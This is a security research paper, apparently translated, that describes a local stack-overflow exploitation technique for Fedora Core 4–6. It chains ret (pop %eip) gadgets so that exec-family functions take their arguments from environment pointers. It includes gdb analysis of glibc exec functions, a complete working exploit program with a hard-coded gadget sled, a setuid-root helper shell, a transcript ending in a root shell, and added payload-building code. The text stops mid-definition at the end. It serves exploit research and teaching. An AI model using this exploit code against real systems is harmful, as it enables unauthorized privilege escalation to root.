------------------------------------------------------------------------------------------------------
Title:    Local stack-based overflow exploit method on Fedora Core 4, 5 and 6, part #2
          (Fedora Core 4,5,6 based local environment stack overflow exploit method)
Subtitle: A local attack technique using ret (pop %eip) code and environment variables
Test environment:
          Fedora Core release 4 (Stentz)   Linux 2.6.11-1.1369_FC4 #1 Thu Jun 2 22:55:56 EDT 2005
          Fedora Core release 5 (Bordeaux) Linux 2.6.15-1.2054_FC5 #1 Tue Mar 14 15:48:33 EST 2006
          Fedora Core release 6 (Zod)      Linux 2.6.18-1.2798.fc6 #1 SMP Mon Oct 16 14:54:20 EDT 2006
Author:   유동훈 - Xpl017Elz
          http://x82.inetcop.org
------------------------------------------------------------------------------------------------------

0) Before the technique itself, some background

This document adds the local buffer overflow technique that I left out of my POC 2006 talk for lack of time. It builds on the ret (pop %eip) technique described in the document "Local stack-based overflow exploit method on Fedora Core 4, 5 and 6"; if you do not know that technique, study the ret (pop %eip) code attack first and then come back to this paper.

How much use this method is against real targets is an open question, which is why I boldly dropped it from the POC 2006 presentation; to be honest, it was less "dropped" than never prepared, given the length of the talk. I am glad to be able to write it up now, late as it is. The idea dates back to when I wrote the local exploit for man: tried against a handful of test programs, it is an attack that becomes possible whenever a large number of ret (pop %eip) words can be placed on the stack.

So why is it of limited use against real applications? Because the vulnerable local variable of a real program is rarely close to the argv[] and envp[] pointer arrays; put differently, bugs are far more likely in frames that are distant from those arrays. What programmer would leave a stack overflow sitting in main() of their own program?
Moreover, the frames a real program allocates on the stack are much larger than those of a test program, and an application of any size naturally has many more locals in each frame. Because we cannot move %esp directly to the argument area of the executable, we can only advance it four bytes at a time with ret (pop %eip) words. So if the stack in use is far from the argv[] and envp[] pointers, a practical attack has to be judged difficult; when attacking a real application I still recommend the symlink method introduced earlier.

1) Theory of the local attack using ret (pop %eip) code and environment variables

The picture changes, however, when the overflow occurs in a local variable of a frame that sits very close to the argv[] and envp[] pointer arrays. In that case the ret (pop %eip) words can carry %esp, four bytes per ret, all the way up to the slot where the environment pointers begin. The earlier ret (pop %eip) + symlink attack used whatever values were already on the stack; this attack instead hands an exec-family function its arguments directly, through the environment. In terms of completeness it is the more refined of the two attacks, though it would have been nicer to have used it against a real application. Let us first look at how the argument and environment pointer arrays are laid out.

2) Analysis of the argv[] and envp[] pointer arrays

Both are arrays of pointers, one per string, and each array is closed by a null word (0x00000000), which is how the end of the array is recognised. Schematically:

------------------------------------------------------------------------------------------------------
  ^
  |  direction of stack growth
 ...
+---------------------+
| argument0 pointer   | : start of argv[]
+---------------------+
| argument1 pointer   |
+---------------------+
| null (0x00000000)   | : end of argv[]
+---------------------+
| environ0 pointer    | : start of envp[]
+---------------------+
| environ1 pointer    |
+---------------------+
| null (0x00000000)   | : end of envp[]
+---------------------+
 ...
  |  direction of increasing addresses
  V
------------------------------------------------------------------------------------------------------

In this picture two arguments are in use and two environment strings were supplied. Concretely, it looks like this:

------------------------------------------------------------------------------------------------------
[root@localhost exec]# cat vuln.c
#include <string.h>
int main(int argc,char *argv[])
{
    char buf[8];
    strcpy(buf,argv[1]); // vulnerable
}
[root@localhost exec]# cat test.c
#include <unistd.h>
int main()
{
    char *environ[]={
        "environ0",
        "environ1",
        0};
    char *argument[]={
        "argument0",
        "argument1argument1", // padded so the copy faults; for this debugging run only
        0};
    execve("./vuln",argument,environ);
}
[root@localhost exec]# gcc -o test test.c
[root@localhost exec]# gdb -q test
...
(gdb) r
Starting program: /home/x82/test
(no debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x6e656d75 in ?? ()
(gdb) x/6x $esp+132
0xfef9b334:     0xfefcdfc6      0xfefcdfd0      0x00000000      0xfefcdfe3
0xfef9b344:     0xfefcdfec      0x00000000
(gdb) x/s 0xfefcdfc6
0xfefcdfc6:      "argument0"           <=== first argument (normally the path of the program being run)
(gdb) x/s 0xfefcdfd0
0xfefcdfd0:      "argument1argument1"  <=== second argument
(gdb) x/s 0xfefcdfe3
0xfefcdfe3:      "environ0"            <=== first environment string
(gdb) x/s 0xfefcdfec
0xfefcdfec:      "environ1"            <=== second environment string
(gdb)
------------------------------------------------------------------------------------------------------

Two arguments and two environment strings were chosen arbitrarily. As described above, each pointer array is followed by a null word (0x00000000). (The fault address 0x6e656d75 is the bytes "umen" of the second argument, read little-endian: the 18-byte string ran past buf and the saved frame pointer into main()'s return-address slot.) Next we analyse the exec family of functions; pay close attention to how each of them handles the program arguments.

3) Analysis of the exec family

The exec-family functions are examined below in the order in which the man page lists them.
(The analysis below was carried out on a Fedora Core 4 system.)

------------------------------------------------------------------------------------------------------
NAME
       execl, execlp, execle, execv, execvp - execute a file
SYNOPSIS
       #include <unistd.h>
       extern char **environ;
       int execl(const char *path, const char *arg, ...);                          - takes 3 arguments
       int execlp(const char *file, const char *arg, ...);                         - takes 3 arguments
       int execle(const char *path, const char *arg , ..., char * const envp[]);   - takes 3 or more
       int execv(const char *path, char *const argv[]);                            - takes 2 arguments
       int execvp(const char *file, char *const argv[]);                           - takes 2 arguments
       ...
       int execve(const char *filename, char *const argv [], char *const envp[]);  - takes 3 arguments

Meaning of the suffix letters:
       l: arguments are passed as a list
       v: arguments are passed as a vector (an array)
       e: an environment is passed
       p: the executable is looked up through the PATH variable
------------------------------------------------------------------------------------------------------

What deserves close attention in the results is where, relative to %esp, each exec-family function reads its arguments; the exploits are written from these debugger observations, so look at them carefully. Two points help when reading the listings. First, the disassembly and the breakpoint sessions were captured with libc mapped at different base addresses (0x007a.... versus 0x0019....; the low twelve bits agree), so only the offsets inside each function matter. Second, the offsets are simply the prologue's effect on %esp: for execl(), four pushes (16 bytes) plus sub $0x101c give 0x102c, and adding the 4-byte return-address slot puts the first argument at %esp+0x1030. The same arithmetic gives 0x14 for execv() (push %ebx, sub $0xc), 0x40 for execvp() (four pushes, sub $0x2c) and 0xc for execve() (two pushes).

3-1) Analysis of the execl() library function

execl() passes its arguments as a list. Internally it calls execve(); right after entry the first argument is at %esp+4, and just before the call to execve() it is read from %esp+0x1030.

Example code: execl("/bin/sh","sh",0); or execl("/bin/sh","sh","-c","ls",0);

------------------------------------------------------------------------------------------------------
Immediately after entering execl(), the arguments start at %esp+4.
After the prologue,
~~~~~~~~~~~
0x007a245c :    push   %ebp
0x007a245d :    push   %edi
0x007a245e :    push   %esi
0x007a245f :    push   %ebx
0x007a2460 :    sub    $0x101c,%esp
the first argument described above is at %esp+0x1030.
~~~~~~~~~~~~~~~~
0x007a2525 :    mov    0xfffffec0(%ebx),%eax
0x007a252b :    mov    (%eax),%eax
0x007a252d :    mov    %eax,0x8(%esp)       <=== third argument of execve() (the caller's environ)
0x007a2531 :    mov    0x14(%esp),%eax
0x007a2535 :    mov    %eax,0x4(%esp)       <=== second argument of execve()
0x007a2539 :    mov    0x1030(%esp),%eax
0x007a2540 :    mov    %eax,(%esp)          <=== first argument of execve()
0x007a2543 :    call   0x7a21ac
...
Breakpoint 1, 0x0019e45c in execl () from /lib/libc.so.6
(gdb) x $esp                     <=== stack pointer right after entering execl()+0
0xbf83b63c:     0x080483ac
(gdb)
0xbf83b640:     0x0804845b       <=== first argument of execl()  (%esp+4)
(gdb)
0xbf83b644:     0x08048458       <=== second argument of execl() (%esp+8)
(gdb)
0xbf83b648:     0x00000000       <=== third argument of execl()  (%esp+12)
(gdb) c
Continuing.
Breakpoint 2, 0x0019e466 in execl () from /lib/libc.so.6
(gdb) x/x $esp+0x1030            <=== after the prologue; %esp is what execve() will be called with
0xbf83b640:     0x0804845b       <=== first argument of execl()
(gdb)
0xbf83b644:     0x08048458       <=== second argument of execl()
(gdb)
0xbf83b648:     0x00000000       <=== third argument of execl()
(gdb)
------------------------------------------------------------------------------------------------------

3-2) Analysis of the execle() library function

execle() passes its arguments as a list together with an environment. Internally it calls execve(); right after entry the first argument is at %esp+4, and just before the call to execve() it is read from %esp+0x1030.

Example code: execle("./sh",0,0); or execle("/bin/sh","sh","-c","ls",env);
(In a real exploit, prepare an sh program that does not handle its arguments; then the shell runs without trouble even though the argument list is empty.)

------------------------------------------------------------------------------------------------------
Immediately after entering execle(), the arguments start at %esp+4.
After the prologue,
~~~~~~~~~~~
0x007a2308 :    push   %ebp
0x007a2309 :    push   %edi
0x007a230a :    push   %esi
0x007a230b :    push   %ebx
0x007a230c :    sub    $0x101c,%esp
the first argument described above is at %esp+0x1030.
~~~~~~~~~~~~~~~~
0x007a23d5 :    mov    0x1018(%esp),%edx
0x007a23dc :    lea    0x4(%edx),%eax
0x007a23df :    mov    %eax,0x1018(%esp)
0x007a23e6 :    mov    (%edx),%eax
0x007a23e8 :    mov    %eax,0x8(%esp)       <=== third argument of execve() (the envp that follows the list's NULL)
0x007a23ec :    mov    0x14(%esp),%eax
0x007a23f0 :    mov    %eax,0x4(%esp)       <=== second argument of execve()
0x007a23f4 :    mov    0x1030(%esp),%eax
0x007a23fb :    mov    %eax,(%esp)          <=== first argument of execve()
0x007a23fe :    call   0x7a21ac
...
Breakpoint 8, 0x007a2308 in execle () from /lib/libc.so.6
(gdb) x/x $esp                   <=== stack pointer right after entering execle()+0
0xbfccf7dc:     0x080483b6
(gdb)
0xbfccf7e0:     0x08048469       <=== first argument of execle()  (%esp+4)
(gdb)
0xbfccf7e4:     0x00000000       <=== second argument of execle() (%esp+8)
(gdb)
0xbfccf7e8:     0x00000000       <=== third argument of execle()  (%esp+12)
(gdb) c
Continuing.
Breakpoint 1, 0x007a23e6 in execle () from /lib/libc.so.6
(gdb) x/x $esp+0x1030            <=== stack pointer just before calling execve()
0xbfccf7e0:     0x08048469       <=== first argument of execle()
(gdb)
0xbfccf7e4:     0x00000000       <=== second argument of execle()
(gdb)
0xbfccf7e8:     0x00000000       <=== third argument of execle()
(gdb)
------------------------------------------------------------------------------------------------------

3-3) Analysis of the execlp() library function

execlp() passes its arguments as a list and resolves the program through the $PATH environment variable. Internally it calls execvp(), which in turn calls execve(); right after entry the first argument is at %esp+4, and just before the call to execvp() it is read from %esp+0x1030. (It is execvp() that actually consults $PATH.)

Example code: execlp("ls","ls","-al",0); or execlp("sh","sh","-c","ls",0);

------------------------------------------------------------------------------------------------------
Immediately after entering execlp(), the arguments start at %esp+4.
After the prologue,
~~~~~~~~~~~
0x007a2978 :    push   %ebp
0x007a2979 :    push   %edi
0x007a297a :    push   %esi
0x007a297b :    push   %ebx
0x007a297c :    sub    $0x101c,%esp
the first argument described above is at %esp+0x1030.
~~~~~~~~~~~~~~~~
0x007a2a23 :    mov    0x14(%esp),%edx
0x007a2a27 :    cmp    %edx,0x10(%esp)
0x007a2a2b :    je     0x7a2a6b
0x007a2a2d :    mov    %edi,0x14(%esp)
0x007a2a31 :    mov    %esi,%ecx
0x007a2a33 :    jmp    0x7a29cc
0x007a2a35 :    mov    %edx,%eax            <=== pointer to the start of the argument vector copied into %eax
0x007a2a37 :    mov    %eax,0x4(%esp)       <=== second argument of execvp()
0x007a2a3b :    mov    0x1030(%esp),%eax
0x007a2a42 :    mov    %eax,(%esp)          <=== first argument of execvp()
0x007a2a45 :    call   0x7a25a0
...
Breakpoint 1, 0x0019e978 in execlp () from /lib/libc.so.6
(gdb) x/x $esp                   <=== stack pointer right after entering execlp()+0
0xbfecb99c:     0x080483ae
(gdb)
0xbfecb9a0:     0x0804845c       <=== first argument of execlp()  (%esp+4):  ls
(gdb)
0xbfecb9a4:     0x0804845c       <=== second argument of execlp() (%esp+8):  ls
(gdb)
0xbfecb9a8:     0x08048458       <=== third argument of execlp()  (%esp+12): -al
(gdb)
0xbfecb9ac:     0x00000000       <=== fourth argument of execlp() (%esp+16): 0
(gdb) c
Continuing.
Breakpoint 2, 0x0019ea45 in execlp () from /lib/libc.so.6
(gdb) x/x $esp+0x1030            <=== stack pointer just before calling execvp()
0xbfecb9a0:     0x0804845c       <=== first argument of execlp()
(gdb)
0xbfecb9a4:     0x0804845c       <=== second argument of execlp()
(gdb)
0xbfecb9a8:     0x08048458       <=== third argument of execlp()
(gdb)
0xbfecb9ac:     0x00000000       <=== fourth argument of execlp()
(gdb)
(gdb) x/x $esp
0xbfeca970:     0x0804845c       <=== first argument of execvp()
(gdb)
0xbfeca974:     0xbfeca988       <=== second argument of execvp() (the vector execlp() built on its own stack)
(gdb)
------------------------------------------------------------------------------------------------------

3-4) Analysis of the execv() library function

execv() passes its arguments as an array. Internally it calls execve(); right after entry the first argument is at %esp+4, and just before the call to execve() it is read from %esp+0x14.

Example code: execv("./sh",0); or char *args[]={"sh","-c","ls",0}; execv("/bin/sh",args);
(In a real exploit, prepare an sh program that does not handle its arguments; then the shell runs without trouble.)

------------------------------------------------------------------------------------------------------
Immediately after entering execv(), the arguments start at %esp+4.
After the prologue,
~~~~~~~~~~~
0x007a22d4 :    push   %ebx
0x007a22d5 :    sub    $0xc,%esp
the first argument described above is at %esp+0x14.
~~~~~~~~~~~~~~
0x007a22e9 :    mov    (%eax),%eax
0x007a22eb :    mov    %eax,0x8(%esp)       <=== third argument of execve()
0x007a22ef :    mov    0x18(%esp),%eax
0x007a22f3 :    mov    %eax,0x4(%esp)       <=== second argument of execve()
0x007a22f7 :    mov    0x14(%esp),%eax
0x007a22fb :    mov    %eax,(%esp)          <=== first argument of execve()
0x007a22fe :    call   0x7a21ac
...
Breakpoint 8, 0x0019e2d4 in execv () from /lib/libc.so.6
(gdb) x/x $esp                   <=== stack pointer right after entering execv()+0
0xbfe26e4c:     0x080483a7
(gdb)
0xbfe26e50:     0x08048450       <=== first argument of execv()  (%esp+4)
(gdb)
0xbfe26e54:     0x00000000       <=== second argument of execv() (%esp+8)
(gdb) c
Continuing.
Breakpoint 1, 0x0019e2e9 in execv () from /lib/libc.so.6
(gdb) x/x $esp+0x14              <=== stack pointer before calling execve()
0xbfe26e50:     0x08048450       <=== first argument of execv()
(gdb) x/x $esp+0x18
0xbfe26e54:     0x00000000       <=== second argument of execv()
(gdb)
------------------------------------------------------------------------------------------------------

3-5) Analysis of the execvp() library function

execvp() passes its arguments as an array and resolves the program through the $PATH environment variable. Internally it calls execve(); right after entry the first argument is at %esp+4. When the first argument is a path (absolute, or otherwise containing a '/'), execve() is called once, with its first argument read from %esp+0x40. When the first argument is a bare file name, the contents of $PATH are consulted and execve() is tried repeatedly, once per directory.

Example code: execvp("./sh",0); or char *args[]={"sh","-c","ls",0}; execvp("sh",args);
(In a real exploit, prepare an sh program that does not handle its arguments; then the shell runs without trouble.)

------------------------------------------------------------------------------------------------------
Immediately after entering execvp(), the arguments start at %esp+4.
After the prologue,
~~~~~~~~~~~
0x0019e5a0 :    push   %ebp
0x0019e5a1 :    push   %edi
0x0019e5a2 :    push   %esi
0x0019e5a3 :    push   %ebx
0x0019e5a4 :    sub    $0x2c,%esp
when the first argument of execvp() is a path, the following code calls execve(); the first argument described above is at %esp+0x40.
~~~~~~~~~~~~~~
0x0019e5f1 :    mov    0xfffffec0(%ebx),%eax
0x0019e5f7 :    mov    (%eax),%eax
0x0019e5f9 :    mov    %eax,0x8(%esp)       <=== third argument of execve()
0x0019e5fd :    mov    0x44(%esp),%ecx
0x0019e601 :    mov    %ecx,0x4(%esp)       <=== second argument of execve()
0x0019e605 :    mov    0x40(%esp),%eax
0x0019e609 :    mov    %eax,(%esp)          <=== first argument of execve()
0x0019e60c :    call   0x19e1ac
...
Breakpoint 1, 0x007a25a0 in execvp () from /lib/libc.so.6
(gdb) x/x $esp                   <=== stack pointer right after entering execvp()+0
0xbfb7cd0c:     0x080483a7
(gdb)
0xbfb7cd10:     0x08048450       <=== first argument of execvp()  (%esp+4)
(gdb)
0xbfb7cd14:     0x00000000       <=== second argument of execvp() (%esp+8)
(gdb) c
Continuing.
Breakpoint 2, 0x007a260c in execvp () from /lib/libc.so.6
(gdb) x/x $esp+0x40              <=== stack pointer just before calling execve()
0xbfb7cd10:     0x08048450       <=== first argument of execvp()
(gdb)
0xbfb7cd14:     0x00000000       <=== second argument of execvp()
(gdb)
------------------------------------------------------------------------------------------------------

3-6) Analysis of the execve() library function

execve() passes its arguments as an array together with an environment and issues the system call. The kernel's system call handler takes its arguments from the registers; this glibc enters the kernel through the __kernel_vsyscall entry point stored at %gs:0x10 (which ends in int $0x80 or sysenter). Right after entry the first argument is at %esp+0x4; just before the kernel is entered it is read from %esp+0xc, and the three arguments are placed in %ebx, %ecx and %edx, with the system call number 0xb (execve) in %eax.

Example code: execve("./sh",0,0); or char *args[]={"sh","-c","ls",0}; execve("/bin/sh",args,env);
(In a real exploit, prepare an sh program that does not handle its arguments; then the shell runs without trouble.)

------------------------------------------------------------------------------------------------------
Immediately after entering execve(), the arguments start at %esp+4.
After the prologue,
~~~~~~~~~~~
0x007a21ac :    push   %edi
0x007a21ad :    push   %ebx
the first argument described above is at %esp+0xc.
~~~~~~~~~~~~~
0x007a21b9 :    mov    0xc(%esp),%edi        <=== first argument of execve()
0x007a21bd :    mov    0x10(%esp),%ecx       <=== second argument of execve()
0x007a21c1 :    mov    0x14(%esp),%edx       <=== third argument of execve()
0x007a21c5 :    xchg   %ebx,%edi
0x007a21c7 :    mov    $0xb,%eax
0x007a21cc :    call   *%gs:0x10
...
Breakpoint 1, 0x007a21ac in execve () from /lib/libc.so.6
(gdb) x/x $esp                   <=== stack pointer right after entering execve()+0
0xbf99878c:     0x080483a9
(gdb)
0xbf998790:     0x08048454       <=== first argument of execve()  (%esp+4)
(gdb)
0xbf998794:     0x00000000       <=== second argument of execve() (%esp+8)
(gdb)
0xbf998798:     0x00000000       <=== third argument of execve()  (%esp+12)
(gdb) c
Continuing.
Breakpoint 2, 0x007a21cc in execve () from /lib/libc.so.6
(gdb) x/x $esp+0x0c
0xbf998790:     0x08048454       <=== first argument of execve()
(gdb)
0xbf998794:     0x00000000       <=== second argument of execve()
(gdb)
0xbf998798:     0x00000000       <=== third argument of execve()
(gdb)
------------------------------------------------------------------------------------------------------

That was a somewhat tedious tour of the exec family. To sum up what they have in common: internally almost all of them end up calling execve(), and each reads its own arguments starting at %esp+4 on entry. They differ only in how the arguments are passed (list or vector) and in whether an environment is supplied; otherwise they are called in much the same way.

4) Local exploit test

Now let us write a local exploit from what was analysed. Whichever function we pick, the payload has the same shape. First, launch the vulnerable program through a function such as execve() that lets us compose its environment, so that each argument of the exec call we are going to trigger can be chosen in advance. Then use ret words to carry %esp up to the slot where the environment pointers we prepared begin, and call the exec-family function there. The following is an example payload that attacks through execve().
------------------------------------------------------------------------------------------------------
Environment layout:
+------------------+
| "./sh"           | : becomes the first argument of execve()
+------------------+
| '\0'             | : becomes the second argument of execve()
+------------------+
| '\0'             | : becomes the third argument of execve()
+------------------+
| '\0'             |
+------------------+
| '\0'             |
+------------------+
| '\0'             |
+------------------+

Payload layout:
All we have to do is place the address of execve() eight bytes before the envp[] pointer array, that is, in the slot holding the last argv[] pointer, just below the null that terminates argv[]. Then, as execve() is entered, it takes its arguments from %esp+4 onwards, and the first environment pointer, our "./sh", is taken as its first argument. (Overwriting argv[1]'s own pointer slot does no harm: the source pointer was loaded before the copy began, and the string itself lives higher up the stack.)
  ^
  |  direction of stack growth
 ...
+------------------+
| buffer           | : the overflowed local variable
+------------------+
| ret(pop %eip)    | : moves %esp up 4 bytes each
+------------------+
| ret(pop %eip)    |
+------------------+
| ret(pop %eip)    |
+------------------+
| ret(pop %eip)    |
+------------------+
| ...              |
+------------------+
| execve()         | : envp[] pointer array - 8 bytes
+------------------+
| null(0x00000000) | : end of the argv[] pointer array
+------------------+
| environ0 pointer | : pointer to the "./sh" string; becomes the first argument of execve()
+------------------+
| environ1 pointer | : pointer to null bytes; becomes the second argument of execve()
+------------------+
| environ2 pointer | : pointer to null bytes; becomes the third argument of execve()
+------------------+
 ...
  |  direction of increasing addresses
  V
------------------------------------------------------------------------------------------------------

The reason for using the environment pointers in the exploit is simple: the exploit can then be written without regard to how the vulnerable program treats its own arguments. It is somewhat less convenient under the debugger, so one can first debug using the argv[] pointers and then, when writing the real exploit, adjust the distance and attack through the envp[] pointers instead. Now let us look at the actual attack code.
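The mechanics of the payload above, as an added example that is not code from the original paper: it models a 32-bit stack image, builds the argv[1] string exactly as the exploits in this document do (n copies of a ret word followed by the three low bytes of the libc address, relying on strcpy()'s NUL for the fourth), then simulates ret popping words until the function address is reached and reports which stack words the callee sees at %esp+4, %esp+8 and %esp+0xc, the offsets measured in section 3. RET_GADGET, FUNC_ADDR and every stack address are assumed values for illustration, not measurements from a live target.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example (not from the original paper): a model of the ret (pop %eip)
 * sled on a 32-bit stack image. Addresses are constructed for illustration. */

#define RET_GADGET 0x080483b6u  /* assumed: address of a lone 'ret' in the target binary */
#define FUNC_ADDR  0x007a21acu  /* assumed: execve() in the FC4 libc of the paper */

/* Number of 4-byte 'ret' words needed to carry %esp from the start of the
 * overflowed buffer to the slot that must receive the function address. */
size_t ret_count(uint32_t buf_addr, uint32_t func_slot)
{
    return (func_slot - buf_addr) / 4;
}

/* Build the payload: n copies of the gadget, then the low three bytes of func.
 * strcpy()'s terminating NUL supplies the 0x00 high byte of a 0x00xxxxxx libc
 * address, so the sled itself must be NUL-free. Returns the payload length
 * (without the terminator), or 0 if strcpy() could not copy it intact. */
size_t build_payload(uint8_t *out, size_t cap, uint32_t gadget, uint32_t func, size_t n)
{
    size_t len = n * 4 + 3, i;
    if (len + 1 > cap || (func >> 24) != 0) return 0;
    for (i = 0; i < 4; i++)
        if (((gadget >> (8 * i)) & 0xff) == 0) return 0;        /* NUL inside the gadget */
    for (i = 0; i < 3; i++)
        if (((func >> (8 * i)) & 0xff) == 0) return 0;          /* NUL inside the address */
    for (i = 0; i < n; i++) {                                   /* little-endian gadget words */
        out[4 * i + 0] = gadget & 0xff;
        out[4 * i + 1] = (gadget >> 8) & 0xff;
        out[4 * i + 2] = (gadget >> 16) & 0xff;
        out[4 * i + 3] = (gadget >> 24) & 0xff;
    }
    out[4 * n + 0] = func & 0xff;
    out[4 * n + 1] = (func >> 8) & 0xff;
    out[4 * n + 2] = (func >> 16) & 0xff;
    out[len] = 0;                                               /* what strcpy() writes last */
    return len;
}

struct call { uint32_t func, ret_addr, arg1, arg2, arg3; };

/* Simulate 'ret' on a word-indexed stack image, starting at the slot that held
 * main()'s return address. Each gadget pops one word; the first non-gadget word
 * is popped into %eip, after which the callee finds its return address at %esp
 * and argument N at %esp+4*N. Returns the index of the slot that held the
 * function address, or (size_t)-1 if the sled runs off the image. */
size_t simulate_sled(const uint32_t *stack, size_t nwords, size_t esp, struct call *c)
{
    while (esp < nwords && stack[esp] == RET_GADGET) esp++;     /* 'ret': pop %eip, %esp += 4 */
    if (esp + 4 > nwords) return (size_t)-1;
    c->func = stack[esp++];                                     /* 'ret' into the function */
    c->ret_addr = stack[esp];                                   /* here: the argv[] terminator */
    c->arg1 = stack[esp + 1];
    c->arg2 = stack[esp + 2];
    c->arg3 = stack[esp + 3];
    return esp - 1;
}

/* Constructed FC4-like image: words 0-1 are buf[8], word 2 the saved %ebp,
 * word 3 main()'s return slot, word 38 the last argv[] pointer slot (where the
 * 38-ret exploit lands execve()), then the argv[] null and the envp[] words
 * from the paper's gdb session. Returns the index of the function slot. */
size_t build_fc4_image(uint32_t *img, size_t nwords)
{
    const uint32_t envp[] = { 0xbf9fffebu, 0xbf9ffff0u, 0xbf9ffff1u,
                              0xbf9ffff2u, 0xbf9ffff3u, 0xbf9ffff4u };
    size_t fslot = 38, i;
    if (nwords < fslot + 9) return 0;
    memset(img, 0, nwords * sizeof *img);
    for (i = 0; i < fslot; i++) img[i] = RET_GADGET;
    img[fslot] = FUNC_ADDR;
    img[fslot + 1] = 0;                                         /* end of argv[] */
    for (i = 0; i < 6; i++) img[fslot + 2 + i] = envp[i];
    img[fslot + 8] = 0;                                         /* end of envp[] */
    return fslot;
}

int main(void)
{
    uint32_t img[48];
    uint8_t payload[256];
    struct call c;
    size_t fslot = build_fc4_image(img, 48);
    size_t len = build_payload(payload, sizeof payload, RET_GADGET, FUNC_ADDR, fslot);
    printf("payload: %zu bytes (%zu ret words + 3 address bytes)\n", len, fslot);
    if (simulate_sled(img, 48, 3, &c) == fslot)
        printf("calls 0x%08x with ret=0x%08x arg1=0x%08x arg2=0x%08x arg3=0x%08x\n",
               c.func, c.ret_addr, c.arg1, c.arg2, c.arg3);
    return 0;
}
```

The simulation starts popping at word 3 because the first three overwritten words (buf and the saved %ebp) are never executed; they hold ret words only because the count is measured from the start of the buffer. build_payload() refuses gadgets or addresses with an embedded NUL, which is the check to run first when porting the exploit to a libc whose addresses do not start with 0x00.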
The attack goes through execve(), and execve() is also used to launch the vulnerable program, because it lets us compose the target's environment. The reason for putting five null entries into the environment is simple. Past the first environment pointer, to "./sh", the second environment pointer must point at a full 4-byte null word (0x00000000), which is why four null bytes are placed back to back; the third environment pointer, which points one byte further on, must also read as a 4-byte 0x00000000, and one more null byte satisfies that condition. (Each "\x00" entry is just an empty string; the kernel copies it as a single NUL byte, and because the strings are packed contiguously the five entries yield five consecutive zero bytes.)

------------------------------------------------------------------------------------------------------
Result of running the attack code:

[root@localhost exec]# cat > vuln.c
/* Proof-of-Concept code */
#include <string.h>
int main(int argc,char *argv[])
{
    char buf[8];
    strcpy(buf,argv[1]);
    return 0;
}
[root@localhost exec]# gcc -o vuln vuln.c
[root@localhost exec]# cat > sh.c
#include <unistd.h>
int main()
{
    setuid(0);
    setgid(0);
    execl("/bin/sh","sh","-p",0);
}
[root@localhost exec]# gcc -o sh sh.c
[root@localhost exec]# cat > 0x82-x_execve.c
/* 0x82-x_execve.c */
#include <unistd.h>
int main()
{
    char *environs[]={
        "./sh",   /* environ0: ./sh */
        "\x00",   /* environ1: 0x00000000 */
        "\x00",   /* environ2: 0x00000000 */
        "\x00",   /* environ3 */
        "\x00",   /* environ4 */
        "\x00",   /* environ5 */
        0};
    /*
    ** execve()'s argument:
    ** --
    ** execve("./sh",[null code pointer],[null code pointer]);
    */
    char *arguments[]={
        "./vuln", /* argument0 */
        /* argument1 */
        "\xb6\x83\x04\x08\xb6\x83\x04\x08\xb6\x83\x04\x08\xb6\x83\x04\x08"
        "\xb6\x83\x04\x08\xb6\x83\x04\x08\xb6\x83\x04\x08\xb6\x83\x04\x08"
        "\xb6\x83\x04\x08\xb6\x83\x04\x08\xb6\x83\x04\x08\xb6\x83\x04\x08"
        "\xb6\x83\x04\x08\xb6\x83\x04\x08\xb6\x83\x04\x08\xb6\x83\x04\x08"
        "\xb6\x83\x04\x08\xb6\x83\x04\x08\xb6\x83\x04\x08\xb6\x83\x04\x08"
        "\xb6\x83\x04\x08\xb6\x83\x04\x08\xb6\x83\x04\x08\xb6\x83\x04\x08"
        "\xb6\x83\x04\x08\xb6\x83\x04\x08\xb6\x83\x04\x08\xb6\x83\x04\x08"
        "\xb6\x83\x04\x08\xb6\x83\x04\x08\xb6\x83\x04\x08\xb6\x83\x04\x08"
        "\xb6\x83\x04\x08\xb6\x83\x04\x08\xb6\x83\x04\x08\xb6\x83\x04\x08"
        "\xb6\x83\x04\x08\xb6\x83\x04\x08"
        /* ret code number: 38 */
        "\xac\x21\x7a", /* execve() */
        0};
    execve("./vuln",arguments,environs);
}
[root@localhost exec]# gcc -o x_execve x_execve.c
[root@localhost exec]# ./x_execve
sh-3.00# exit
exit
[root@localhost exec]#

gdb debugging result:

[root@localhost exec]# gdb x_execve -q
(no debugging symbols found)
Using host libthread_db library "/lib/libthread_db.so.1".
(gdb) r
Starting program: /tmp/x_execve
Reading symbols from shared object read from target memory...(no debugging symbols found)...done.
Loaded system supplied DSO at 0x2a2000
(no debugging symbols found)
(no debugging symbols found)
Program received signal SIGSEGV, Segmentation fault.
0x00000000 in ?? ()
(gdb) x/7x $esp
0xbf9fde80:     0xbf9fffeb      0xbf9ffff0      0xbf9ffff1      0xbf9ffff2
0xbf9fde90:     0xbf9ffff3      0xbf9ffff4      0x00000000
(gdb) x/s 0xbf9fffeb
0xbf9fffeb:      "./sh"          <=== becomes the first argument of execve()
(gdb) x/x 0xbf9ffff0
0xbf9ffff0:     0x00000000       <=== becomes the second argument of execve()
(gdb) x/x 0xbf9ffff1
0xbf9ffff1:     0x00000000       <=== becomes the third argument of execve()
(gdb)

When execve() is called, its arguments are filled in as follows; note that the second and third arguments point at null bytes. Equally, using the argv[] pointers, the attack succeeds with literal null words in the second and third arguments:

execve("./sh",0xbf9ffff0,0xbf9ffff1);   or   execve("./sh",0x00000000,0x00000000);

(In this gdb session the fault address 0x00000000 is the argv[] terminator: whether the sled popped it directly or execve() returned into it after failing (it occupies the return-address slot of the call), %esp is left resting on envp[0], so the dump shows exactly the words that become the three arguments.)
------------------------------------------------------------------------------------------------------

As the result shows, %esp can be carried up to the environment pointers we prepared. If the local variable is close to the argv[]/envp[] pointer arrays this is entirely feasible; and, as the analysis in section 3 showed, not only execve() but every exec-family function can be used for the attack. The remaining attack code is given in the appendix.

5) Real exploit

I have not yet applied this method to a real application. Work on that never stops, so by the time you read this document I may well be developing an exploit for such a vulnerability.
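The pointer-array layout of section 2 and the five-null-entry rule explained above, as an added example that is not code from the original paper: it models the initial stack that execve() builds for the target (argv strings, envp strings and the exec filename packed back to back, each NUL-terminated, with the argv[] and envp[] pointer arrays closed by null words and envp[] starting at &argv[argc+1]), then reads the 32-bit word an exec-family function would see when an envp[] entry lands in one of its argument slots. The strings are constructed for illustration; each "\x00" entry of the exploit is simply an empty string.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example (not from the original paper): a model of the argv/envp area
 * the kernel lays out for a new process. Strings are constructed for illustration. */

#define AREA 256
#define MAXVEC 16

struct layout {
    char  area[AREA];            /* string area, lowest address first */
    char *vec[2 * MAXVEC + 2];   /* argv[0..argc-1], NULL, envp[0..envc-1], NULL */
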